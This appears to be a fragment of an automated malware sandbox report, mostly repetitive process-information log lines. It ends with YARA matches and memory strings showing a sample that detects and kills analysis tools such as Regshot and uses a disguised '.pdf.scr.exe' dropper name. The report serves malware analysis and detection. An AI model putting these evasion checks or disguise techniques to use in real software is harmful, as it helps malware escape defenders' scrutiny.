Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match	File source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESW
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXEQ
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXED
Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE=
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LFILENAMEAUTORUNS.EXEL,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXEL~
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
